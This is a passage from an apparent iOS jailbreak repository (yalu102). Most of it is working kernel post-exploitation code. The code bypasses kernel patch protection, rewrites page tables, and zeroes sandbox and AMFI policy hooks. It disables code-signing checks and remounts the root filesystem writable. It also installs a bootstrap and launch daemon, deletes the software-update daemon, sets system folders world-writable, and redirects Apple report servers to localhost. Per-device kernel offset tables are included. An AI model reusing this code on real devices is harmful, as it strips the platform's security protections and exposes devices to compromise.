WriteAnywhere32(kppsh+n, 0xd5033fdf); n+=4; // isb 439 | WriteAnywhere32(kppsh+n, 0xd65f03c0); n+=4; // ret 440 | WriteAnywhere64(kppsh+n, ReadAnywhere64(ttbr0_real)); n+=8; 441 | WriteAnywhere64(kppsh+n, physp); n+=8; 442 | WriteAnywhere64(kppsh+n, physp); n+=8; 443 | } 444 | 445 | mach_vm_protect(tfp0, kppsh, 0x4000, 0, VM_PROT_READ|VM_PROT_EXECUTE); 446 | 447 | WriteAnywhere64(shellcode + 0x100 + 0x10, shc - gVirtBase + gPhysBase); // idle 448 | WriteAnywhere64(shellcode + 0x200 + 0x10, shc + 0x100 - gVirtBase + gPhysBase); // idle 449 | 450 | WriteAnywhere64(shellcode + 0x100 + 0x18, idlesleep_handler - gVirtBase + gPhysBase + 8); // idlehandler 451 | WriteAnywhere64(shellcode + 0x200 + 0x18, idlesleep_handler - gVirtBase + gPhysBase + 8); // deephandler 452 | 453 | /* 454 | 455 | pagetables are now not real anymore, they're real af 456 | 457 | */ 458 | 459 | int cpacr_idx = 0; 460 | uint32_t* opps = gadget_base - min + kdump; 461 | 462 | while (1) { 463 | if (opps[cpacr_idx] == 0xd5181040) { 464 | NSLog(@"got a cpacr"); 465 | break; 466 | } 467 | cpacr_idx++; 468 | } 469 | #define PSZ (isvad ? 0x1000 : 0x4000) 470 | #define PMK (PSZ-1) 471 | 472 | 473 | #define RemapPage_(address) \ 474 | pagestuff_64((address) & (~PMK), ^(vm_address_t tte_addr, int addr) {\ 475 | uint64_t tte = ReadAnywhere64(tte_addr);\ 476 | if (!(TTE_GET(tte, TTE_IS_TABLE_MASK))) {\ 477 | NSLog(@"breakup!");\ 478 | uint64_t fakep = physalloc(PSZ);\ 479 | uint64_t realp = TTE_GET(tte, TTE_PHYS_VALUE_MASK);\ 480 | TTE_SETB(tte, TTE_IS_TABLE_MASK);\ 481 | for (int i = 0; i < PSZ/8; i++) {\ 482 | TTE_SET(tte, TTE_PHYS_VALUE_MASK, realp + i * PSZ);\ 483 | WriteAnywhere64(fakep+i*8, tte);\ 484 | }\ 485 | TTE_SET(tte, TTE_PHYS_VALUE_MASK, findphys_real(fakep));\ 486 | WriteAnywhere64(tte_addr, tte);\ 487 | }\ 488 | uint64_t newt = physalloc(PSZ);\ 489 | copyin(bbuf, TTE_GET(tte, TTE_PHYS_VALUE_MASK) - gPhysBase + gVirtBase, PSZ);\ 490 | copyout(newt, bbuf, PSZ);\ 491 | TTE_SET(tte, TTE_PHYS_VALUE_MASK, findphys_real(newt));\ 492 | TTE_SET(tte, TTE_BLOCK_ATTR_UXN_MASK, 0);\ 493 | TTE_SET(tte, TTE_BLOCK_ATTR_PXN_MASK, 0);\ 494 | WriteAnywhere64(tte_addr, tte);\ 495 | NSLog(@"level %llx - %llx", tte_addr, TTE_GET(tte, TTE_PHYS_VALUE_MASK));\ 496 | }, level1_table, isvad ? 1 : 2); 497 | 498 | #define NewPointer(origptr) (((origptr) & PMK) | findphys_real(origptr) - gPhysBase + gVirtBase) 499 | 500 | uint64_t* remappage = calloc(512, 8); 501 | 502 | int remapcnt = 0; 503 | 504 | 505 | #define RemapPage(x)\ 506 | {\ 507 | int fail = 0;\ 508 | for (int i = 0; i < remapcnt; i++) {\ 509 | if (remappage[i] == (x & (~PMK))) {\ 510 | fail = 1;\ 511 | }\ 512 | }\ 513 | if (fail == 0) {\ 514 | RemapPage_(x);\ 515 | RemapPage_(x+PSZ);\ 516 | remappage[remapcnt++] = (x & (~PMK));\ 517 | }\ 518 | } 519 | 520 | level1_table = physp - gPhysBase + gVirtBase; 521 | WriteAnywhere64(ReadAnywhere64(pmap_store), level1_table); 522 | 523 | 524 | uint64_t shtramp = kernbase + mh_kern->sizeofcmds + sizeof(struct mach_header_64); 525 | RemapPage(gadget_base + cpacr_idx*4); 526 | WriteAnywhere32(NewPointer(gadget_base + cpacr_idx*4), 0x94000000 | (((shtramp - (gadget_base+cpacr_idx*4))/4) & 0x3FFFFFF)); 527 | 528 | RemapPage(shtramp); 529 | WriteAnywhere32(NewPointer(shtramp), 0x58000041); 530 | WriteAnywhere32(NewPointer(shtramp)+4, 0xd61f0020); 531 | WriteAnywhere64(NewPointer(shtramp)+8, kppsh); 532 | 533 | uint64_t lwvm_write = find_lwvm_mapio_patch(); 534 | uint64_t lwvm_value = find_lwvm_mapio_newj(); 535 | RemapPage(lwvm_write); 536 | WriteAnywhere64(NewPointer(lwvm_write), lwvm_value); 537 | 538 | 539 | uint64_t kernvers = (uint8_t*)memmem(whole_dump, (size_t)whole_size, "Darwin Kernel Version", strlen("Darwin Kernel Version")) - whole_dump; 540 | uint64_t release = (uint8_t*)memmem(whole_dump, (size_t)whole_size, "RELEASE_ARM", strlen("RELEASE_ARM")) - whole_dump; 541 | 542 | RemapPage(kernvers+whole_base-4); 543 | WriteAnywhere32(NewPointer(kernvers+whole_base-4), 1); 544 | 545 | RemapPage(release+whole_base); 546 | if (NewPointer(release+whole_base) == (NewPointer(release+whole_base+11) - 11)) { 547 | copyout(NewPointer(release+whole_base), "MarijuanARM", 11); /* marijuanarm */ 548 | } 549 | 550 | uint64_t memcmp_got = find_amfi_memcmpstub(); 551 | uint64_t ret1 = find_ret_0(); 552 | 553 | RemapPage(memcmp_got); 554 | WriteAnywhere64(NewPointer(memcmp_got), ret1); 555 | 556 | uint64_t fref = find_reference((uint32_t*)get_data_for_mode(0, SearchTextExec), text_exec_size, text_exec_base, idlesleep_handler+0xC) + text_exec_base; 557 | NSLog(@"fref at %llx", fref); 558 | 559 | uint64_t find_string_reference(char* string, enum Search mode); 560 | uint64_t amfiops = 0; 561 | //= find_string_reference("Apple Mobile File Integrity", SearchPrelinkExec); 562 | char* sbstr = memmem(whole_dump, whole_size, "Apple Mobile File Integrity", strlen("Apple Mobile File Integrity")); 563 | for (int i = 0; i < whole_size/8; i++) { 564 | if (*(uint64_t*)(whole_dump+i*8) == (sbstr - (uint64_t)whole_dump + whole_base)) { 565 | amfiops = *(uint64_t*)(whole_dump+i*8+0x18); 566 | break; 567 | } 568 | } 569 | 570 | NSLog(@"amfistr at %llx", amfiops); 571 | 572 | 573 | { 574 | /* 575 | amfi 576 | */ 577 | 578 | uint64_t sbops = amfiops; 579 | uint64_t sbops_end = sbops + sizeof(struct mac_policy_ops); 580 | 581 | uint64_t nopag = sbops_end - sbops; 582 | 583 | int ctr = 0; 584 | for (int i = 0; i < nopag; i+= PSZ) { 585 | RemapPage(((sbops + i) & (~PMK))); 586 | } 587 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_file_check_mmap)), 0); 588 | } 589 | 590 | 591 | /* 592 | first str 593 | */ 594 | while (1) { 595 | uint32_t opcode = ReadAnywhere32(fref); 596 | if ((opcode & 0xFFC00000) == 0xF9000000) { 597 | int32_t outhere = ((opcode & 0x3FFC00) >> 10) * 8; 598 | int32_t myreg = (opcode >> 5) & 0x1f; 599 | uint64_t rgz = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), fref-gadget_base, text_exec_base, myreg)+outhere; 600 | 601 | 602 | WriteAnywhere64(rgz, physcode+0x200); 603 | break; 604 | } 605 | fref += 4; 606 | } 607 | 608 | fref += 4; 609 | 610 | /* 611 | second str 612 | */ 613 | while (1) { 614 | uint32_t opcode = ReadAnywhere32(fref); 615 | if ((opcode & 0xFFC00000) == 0xF9000000) { 616 | int32_t outhere = ((opcode & 0x3FFC00) >> 10) * 8; 617 | int32_t myreg = (opcode >> 5) & 0x1f; 618 | uint64_t rgz = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), fref-gadget_base, text_exec_base, myreg)+outhere; 619 | 620 | WriteAnywhere64(rgz, physcode+0x100); 621 | break; 622 | } 623 | fref += 4; 624 | } 625 | 626 | 627 | 628 | 629 | 630 | { 631 | /* 632 | sandbox 633 | */ 634 | 635 | uint64_t sbops = find_sbops(); 636 | uint64_t sbops_end = sbops + sizeof(struct mac_policy_ops) + PMK; 637 | 638 | uint64_t nopag = (sbops_end - sbops)/(PSZ); 639 | 640 | int ctr = 0; 641 | for (int i = 0; i < nopag; i++) { 642 | RemapPage(((sbops + i*(PSZ)) & (~PMK))); 643 | } 644 | 645 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_file_check_mmap)), 0); 646 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_rename)), 0); 647 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_rename)), 0); 648 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_access)), 0); 649 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_chroot)), 0); 650 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_create)), 0); 651 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_deleteextattr)), 0); 652 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_exchangedata)), 0); 653 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_exec)), 0); 654 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getattrlist)), 0); 655 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getextattr)), 0); 656 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_ioctl)), 0); 657 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_link)), 0); 658 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_listextattr)), 0); 659 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_open)), 0); 660 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_readlink)), 0); 661 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setattrlist)), 0); 662 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setextattr)), 0); 663 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setflags)), 0); 664 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setmode)), 0); 665 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setowner)), 0); 666 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setutimes)), 0); 667 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setutimes)), 0); 668 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_stat)), 0); 669 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_truncate)), 0); 670 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_unlink)), 0); 671 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_notify_create)), 0); 672 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_fsgetpath)), 0); 673 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getattr)), 0); 674 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_mount_check_stat)), 0); 675 | 676 | } 677 | 678 | { 679 | uint64_t point = find_amfiret()-0x18; 680 | 681 | RemapPage((point & (~PMK))); 682 | uint64_t remap = NewPointer(point); 683 | 684 | assert(ReadAnywhere32(point) == ReadAnywhere32(remap)); 685 | 686 | WriteAnywhere32(remap, 0x58000041); 687 | WriteAnywhere32(remap + 4, 0xd61f0020); 688 | WriteAnywhere64(remap + 8, shc+0x200); /* amfi shellcode */ 689 | 690 | } 691 | 692 | for (int i = 0; i < z; i++) { 693 | WriteAnywhere64(plist[i], physcode + 0x100); 694 | } 695 | 696 | while (ReadAnywhere32(kernvers+whole_base-4) != 1) { 697 | sleep(1); 698 | } 699 | 700 | NSLog(@"enabled patches"); 701 | 702 | { 703 | // mount patch 704 | extern uint64_t rootvnode_offset; 705 | uint64_t rootfs_vnode = ReadAnywhere64(rootvnode_offset + kernbase); 706 | 707 | struct utsname uts; 708 | uname(&uts); 709 | 710 | vm_offset_t off = 0xd8; 711 | if (strstr(uts.version, "16.0.0")) { 712 | off = 0xd0; 713 | } 714 | 715 | uint64_t v_mount = ReadAnywhere64(rootfs_vnode+off); 716 | 717 | uint32_t v_flag = ReadAnywhere32(v_mount + 0x71); 718 | 719 | WriteAnywhere32(v_mount + 0x71, v_flag & (~(0x1<<6))); 720 | 721 | char* nmz = strdup("/dev/disk0s1s1"); 722 | int lolr = mount( "hfs", "/", MNT_UPDATE, (void*)&nmz); 723 | NSLog(@"remounting: %d", lolr); 724 | 725 | v_mount = ReadAnywhere64(rootfs_vnode+off); 726 | 727 | WriteAnywhere32(v_mount + 0x71, v_flag); 728 | } 729 | 730 | { 731 | char path[256]; 732 | uint32_t size = sizeof(path); 733 | _NSGetExecutablePath(path, &size); 734 | char* pt = realpath(path, 0); 735 | 736 | { 737 | __block pid_t pd = 0; 738 | NSString* execpath = [[NSString stringWithUTF8String:pt] stringByDeletingLastPathComponent]; 739 | 740 | 741 | int f = open("/.installed_yaluX", O_RDONLY); 742 | 743 | if (f == -1) { 744 | NSString* tar = [execpath stringByAppendingPathComponent:@"tar"]; 745 | NSString* bootstrap = [execpath stringByAppendingPathComponent:@"bootstrap.tar"]; 746 | const char* jl = [tar UTF8String]; 747 | 748 | unlink("/bin/tar"); 749 | unlink("/bin/launchctl"); 750 | 751 | copyfile(jl, "/bin/tar", 0, COPYFILE_ALL); 752 | chmod("/bin/tar", 0777); 753 | jl="/bin/tar"; // 754 | 755 | chdir("/"); 756 | 757 | posix_spawn(&pd, jl, 0, 0, (char**)&(const char*[]){jl, "--preserve-permissions", "-xvf", [bootstrap UTF8String], NULL}, NULL); 758 | NSLog(@"pid = %x", pd); 759 | waitpid(pd, 0, 0); 760 | 761 | 762 | NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"launchctl"]; 763 | jl = [jlaunchctl UTF8String]; 764 | 765 | copyfile(jl, "/bin/launchctl", 0, COPYFILE_ALL); 766 | chmod("/bin/launchctl", 0755); 767 | 768 | open("/.installed_yaluX", O_RDWR|O_CREAT); 769 | open("/.cydia_no_stash",O_RDWR|O_CREAT); 770 | 771 | 772 | system("echo '127.0.0.1 iphonesubmissions.apple.com' >> /etc/hosts"); 773 | system("echo '127.0.0.1 radarsubmissions.apple.com' >> /etc/hosts"); 774 | 775 | system("/usr/bin/uicache"); 776 | 777 | system("killall -SIGSTOP cfprefsd"); 778 | NSMutableDictionary* md = [[NSMutableDictionary alloc] initWithContentsOfFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist"]; 779 | 780 | [md setObject:[NSNumber numberWithBool:YES] forKey:@"SBShowNonDefaultSystemApps"]; 781 | 782 | [md writeToFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist" atomically:YES]; 783 | system("killall -9 cfprefsd"); 784 | 785 | } 786 | { 787 | NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"reload"]; 788 | char* jl = [jlaunchctl UTF8String]; 789 | unlink("/usr/libexec/reload"); 790 | copyfile(jl, "/usr/libexec/reload", 0, COPYFILE_ALL); 791 | chmod("/usr/libexec/reload", 0755); 792 | chown("/usr/libexec/reload", 0, 0); 793 | 794 | } 795 | { 796 | NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"0.reload.plist"]; 797 | char* jl = [jlaunchctl UTF8String]; 798 | unlink("/Library/LaunchDaemons/0.reload.plist"); 799 | copyfile(jl, "/Library/LaunchDaemons/0.reload.plist", 0, COPYFILE_ALL); 800 | chmod("/Library/LaunchDaemons/0.reload.plist", 0644); 801 | chown("/Library/LaunchDaemons/0.reload.plist", 0, 0); 802 | } 803 | unlink("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist"); 804 | 805 | } 806 | } 807 | chmod("/private", 0777); 808 | chmod("/private/var", 0777); 809 | chmod("/private/var/mobile", 0777); 810 | chmod("/private/var/mobile/Library", 0777); 811 | chmod("/private/var/mobile/Library/Preferences", 0777); 812 | 813 | system("(echo 'really jailbroken'; /bin/launchctl load /Library/LaunchDaemons/0.reload.plist)&"); 814 | WriteAnywhere64(bsd_task+0x100, orig_cred); 815 | sleep(2); 816 | 817 | NSLog(@"done"); 818 | } 819 | -------------------------------------------------------------------------------- /SourceCode/yalu102/launchctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/launchctl -------------------------------------------------------------------------------- /SourceCode/yalu102/main.m: -------------------------------------------------------------------------------- 1 | // 2 | // main.m 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import 10 | #import "AppDelegate.h" 11 | 12 | int main(int argc, char * argv[]) { 13 | @autoreleasepool { 14 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /SourceCode/yalu102/offsets.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "offsets.h" 7 | 8 | uint64_t allproc_offset; 9 | uint64_t kernproc_offset; 10 | uint64_t procoff; 11 | uint64_t rootvnode_offset; 12 | 13 | void init_offsets() { 14 | struct utsname u = { 0 }; 15 | uname(&u); 16 | 17 | printf("sysname: %s\n", u.sysname); 18 | printf("nodename: %s\n", u.nodename); 19 | printf("release: %s\n", u.release); 20 | printf("version: %s\n", u.version); 21 | printf("machine: %s\n", u.machine); 22 | 23 | allproc_offset = 0x5a4148; 24 | procoff = 0x360; 25 | rootvnode_offset = 0x5aa0b8; 26 | 27 | /* 28 | Offsets shared by: 29 | - @qwertyoruiop 30 | - @Mila432 31 | - @Andywiik 32 | - @nicogibbons 33 | - @jtv7 34 | - @onchehuh 35 | */ 36 | 37 | if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7001") == 0) { 38 | allproc_offset = 0x5b8528; 39 | rootvnode_offset = 0x5be0b8; 40 | } 41 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000") == 0) { 42 | allproc_offset = 0x5b8468; 43 | rootvnode_offset = 0x5be0b8; 44 | } 45 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S8000") == 0) { 46 | allproc_offset = 0x5a8438; 47 | rootvnode_offset = 0x5ae0b8; 48 | } 49 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S5L8960X") == 0) { 50 | allproc_offset = 0x5ac418; 51 | rootvnode_offset = 0x5b20b8; 52 | } 53 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010") == 0) { 54 | allproc_offset = 0x5ec478; 55 | rootvnode_offset = 0x5f20b8; 56 | } 57 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Mon Dec 19 19:56:48 PST 2016; root:xnu-3789.43.2~1/RELEASE_ARM64_T7000") == 0) { 58 | allproc_offset = 0x5b8468; 59 | rootvnode_offset = 0x5be0b8; 60 | }//apple tv 4 61 | else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 20:25:47 PST 2016; root:xnu-3789.33.1~1/RELEASE_ARM64_T7000") == 0) { 62 | allproc_offset = 0x5b8468; 63 | rootvnode_offset = 0x5be0b8; 64 | }//apple tv 4 65 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 22:13:19 PDT 2016; root:xnu-3789.23.3~2/RELEASE_ARM64_T7000") == 0) { 66 | allproc_offset = 0x5b4168; 67 | rootvnode_offset = 0x5ba0b8; 68 | }//apple tv 4 69 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:10 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T8010") == 0) { 70 | allproc_offset = 0x5ec178; 71 | rootvnode_offset = 0x5f20b8; 72 | } 73 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7001") == 0) { 74 | allproc_offset = 0x5b4228; 75 | rootvnode_offset = 0x5ba0b8; 76 | } 77 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7000") == 0) { 78 | allproc_offset = 0x5b4168; 79 | rootvnode_offset = 0x5ba0b8; 80 | } 81 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000") == 0) { 82 | allproc_offset = 0x5a4148; 83 | rootvnode_offset = 0x5aa0b8; 84 | } 85 | else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S5L8960X") == 0) { 86 | allproc_offset = 0x5a4128; 87 | rootvnode_offset = 0x5aa0b8; 88 | } 89 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T8010") == 0) { 90 | allproc_offset = 0x5ec178; 91 | rootvnode_offset = 0x5f20b8; 92 | } 93 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7001") == 0) { 94 | allproc_offset = 0x5b0228; 95 | rootvnode_offset = 0x5b60b8; 96 | } 97 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7000") == 0) { 98 | allproc_offset = 0x5b0168; 99 | rootvnode_offset = 0x5b60b8; 100 | } 101 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S8000") == 0) { 102 | allproc_offset = 0x5a4148; 103 | rootvnode_offset = 0x5aa0b8; 104 | } 105 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S5L8960X") == 0) { 106 | allproc_offset = 0x5a4128; 107 | rootvnode_offset = 0x5aa0b8; 108 | } 109 | else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Fri Aug 5 22:15:30 PDT 2016; root:xnu-3789.1.24~11/RELEASE_ARM64_S5L8960X") == 0) { 110 | allproc_offset = 0x5a4128; 111 | rootvnode_offset = 0x5aa0b8; 112 | }//some beta ios 113 | else { 114 | printf("missing offset, prob crashing\n"); 115 | } 116 | } -------------------------------------------------------------------------------- /SourceCode/yalu102/offsets.h: -------------------------------------------------------------------------------- 1 | #ifndef offsets_h 2 | #define offsets_h 3 | 4 | #import 5 | 6 | // offsets from the main kernel 0xfeedfacf 7 | extern uint64_t allproc_offset; 8 | extern uint64_t kernproc_offset; 9 | 10 | // offsets in struct proc 11 | extern uint64_t struct_proc_p_pid_offset; 12 | extern uint64_t struct_proc_task_offset; 13 | extern uint64_t struct_proc_p_uthlist_offset; 14 | extern uint64_t struct_proc_p_ucred_offset; 15 | extern uint64_t struct_proc_p_comm_offset; 16 | 17 | // offsets in struct kauth_cred 18 | extern uint64_t struct_kauth_cred_cr_ref_offset; 19 | 20 | // offsets in struct uthread 21 | extern uint64_t struct_uthread_uu_ucred_offset; 22 | extern uint64_t struct_uthread_uu_list_offset; 23 | 24 | // offsets in struct task 25 | extern uint64_t struct_task_ref_count_offset; 26 | extern uint64_t struct_task_itk_space_offset; 27 | 28 | // offsets in struct ipc_space 29 | extern uint64_t struct_ipc_space_is_table_offset; 30 | 31 | // offsets in struct ipc_port 32 | extern uint64_t struct_ipc_port_ip_kobject_offset; 33 | 34 | void init_offsets(); 35 | extern uint64_t rootvnode_offset; 36 | 37 | #endif 38 | -------------------------------------------------------------------------------- /SourceCode/yalu102/patchfinder64.h: -------------------------------------------------------------------------------- 1 | // 2 | // patchfinder64.h 3 | // 4 | // Created by qwertyoruiop on 21/09/16. 5 | // Copyright © 2016 qwertyoruiop. All rights reserved. 6 | // 7 | 8 | #ifndef patchfinder64_h 9 | #define patchfinder64_h 10 | 11 | #import 12 | 13 | extern uint64_t text_exec_base; 14 | extern uint64_t text_exec_size; 15 | 16 | extern uint64_t prelink_exec_base; 17 | extern uint64_t prelink_exec_size; 18 | 19 | extern uint64_t whole_base; 20 | extern uint64_t whole_size; 21 | extern uint8_t* whole_dump; 22 | extern uint64_t find_register_value(uint32_t* opcodes, uint64_t offset, uint64_t opcode_base, uint8_t reg); 23 | extern uint64_t find_reference(uint32_t* opcodes, size_t opcode_size, uint64_t opcode_base, uint64_t target); 24 | enum Search { 25 | SearchTextExec, 26 | SearchPrelinkExec 27 | }; 28 | extern char uref; 29 | extern uint64_t get_data_for_mode(uint64_t offset, enum Search mode); 30 | 31 | 32 | 33 | void set_text_exec(uint64_t text_exec_base_,uint64_t text_exec_size_); 34 | void set_prelink_exec(uint64_t prelink_exec_base_, uint64_t prelink_exec_size_); 35 | void set_dump(uint64_t whole_base_,uint64_t whole_size_, uint8_t* whole_dump_); 36 | uint64_t find_kernel_pmap(); 37 | uint64_t find_gPhysBase(); 38 | uint64_t find_flushcache(); 39 | uint64_t find_amfi_memcmpstub(); 40 | uint64_t find_memwithphys(); 41 | uint64_t find_kernel_mount(); 42 | uint64_t find_vnode_lookup(); 43 | uint64_t find_cpu_list(); 44 | uint64_t find_cpacr_write(); 45 | uint64_t find_lwvm_mapio_patch(); 46 | uint64_t find_lwvm_mapio_newj(); 47 | uint64_t find_ret_non0(); 48 | uint64_t find_ret_0(); 49 | uint64_t find_amfiret(); 50 | uint64_t find_sbops(); 51 | #define CS_VALID 0x0000001 /* dynamically valid */ 52 | #define CS_ADHOC 0x0000002 /* ad hoc signed */ 53 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ 54 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */ 55 | 56 | #define CS_HARD 0x0000100 /* don't load invalid pages */ 57 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */ 58 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ 59 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ 60 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */ 61 | #define CS_REQUIRE_LV 0x0002000 /* require library validation */ 62 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000 63 | 64 | #define CS_ALLOWED_MACHO 0x00ffffe 65 | 66 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ 67 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ 68 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ 69 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ 70 | 71 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ 72 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ 73 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ 74 | #define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ 75 | #endif /* patchfinder64_h */ 76 | -------------------------------------------------------------------------------- /SourceCode/yalu102/patchfinder64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/patchfinder64.o -------------------------------------------------------------------------------- /SourceCode/yalu102/pte_stuff.h: -------------------------------------------------------------------------------- 1 | #ifndef pte_stuff_h 2 | #define pte_stuff_h 3 | 4 | 5 | #define TTE_INDEX_SHIFT 3 6 | #define TTE_SIZE (1 << TTE_INDEX_SHIFT) 7 | #define TTE_INDEX(vma, level) ((vma.vm_info.level ## _index) << TTE_INDEX_SHIFT) 8 | #define TTE_GET(tte, mask) (tte & mask) 9 | #define TTE_SETB(tte, mask) tte = tte | mask 10 | #define TTE_SET(tte, mask, val) tte = ((tte & (~mask)) | (val & mask)) 11 | #define TTE_IS_VALID_MASK 0x1 12 | #define TTE_IS_TABLE_MASK 0x2 13 | #define TTE_BLOCK_ATTR_INDEX_MASK 0x1C 14 | #define TTE_BLOCK_ATTR_NS_MASK 0x20 15 | #define TTE_BLOCK_ATTR_AP_MASK 0xC0 16 | #define TTE_BLOCK_ATTR_AP_RO_MASK 0x80 17 | #define 